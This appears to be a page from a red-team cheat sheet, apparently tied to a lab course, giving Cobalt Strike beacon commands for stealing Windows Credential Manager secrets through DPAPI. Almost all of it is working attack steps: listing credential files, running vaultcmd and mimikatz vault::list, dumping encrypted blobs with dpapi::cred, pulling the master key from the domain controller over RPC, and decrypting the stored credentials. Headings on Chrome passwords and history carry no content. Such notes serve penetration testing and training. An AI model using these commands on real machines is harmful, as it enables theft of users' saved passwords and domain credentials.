DPAPI

Credential Manager

# Location
beacon> ls C:\Users\bfarmer\AppData\Local\Microsoft\Credentials

# OR
beacon> run vaultcmd /listcreds:"Windows Credentials" /all

# OR
beacon> mimikatz vault::list

# Dump The Encrypted Data (pbData, guidMasterKey)
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\9D54C839752B38B233E5D56FDD7891A7

# Get Master Key (Key)
beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-3263068140-2042698922-2891547269-1120\a23a1631-e2ca-4805-9f2f-fe8966fd8698 /rpc 

# Decrypting
beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\9D54C839752B38B233E5D56FDD7891A7 /masterkey:0c0105785f89063857239915037fbbf0ee049d984a09a7ae34f7cfc31ae4e6fd029e6036cde245329c635a6839884542ec97bf640242889f61d80b7851aba8df

Windows Credentials Manager

Web Credentials Manager

Google Chrome

Chrome Passwords

Chrome History

Other Saved Credentials

PreviousKerberos TicketsNextUser Impersonation

Last updated